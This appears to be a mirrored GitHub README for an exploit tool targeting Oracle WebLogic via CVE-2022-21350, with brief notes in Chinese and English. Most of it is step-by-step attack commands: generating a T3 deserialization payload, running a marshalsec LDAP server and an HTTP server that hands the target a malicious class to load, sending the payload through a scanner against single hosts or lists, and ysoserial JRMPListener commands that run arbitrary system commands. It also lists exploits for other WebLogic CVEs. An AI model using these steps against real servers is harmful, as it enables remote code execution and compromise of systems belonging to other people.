Giters

hktalent / CVE-2022-21350

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

为什么两个poc 一个带 com._51pwn.hktalent.CreatJar.main(args); 是用来创建最小生成payload工具时使用的 创建后使用另外一个

运行 CVE-2022-21350_powerBy_51pwn.jar 构建payload报错不影响payload的使用

other exp

CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

How use

1- generate payload

docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- start ldap server

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- start http server,for send class file

node httpServer.js

4- send payload

py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s

java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59" java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

Where is payload

cat test.ser

Why out error message

Running the error does not affect the generation of the payload and the effect of the payload 运行报错不影响payload的生成、不影响payload的效果

How attack

nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

tools support:

  • 1-weblogic ver
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 2-JDK < 1.8
  • 3-Server allow OOB

How build,merge jar

cd lib3
# split 
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge 
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

Special thanks

About

Languages

Language:Java 91.7%Language:Shell 7.6%Language:Python 0.7%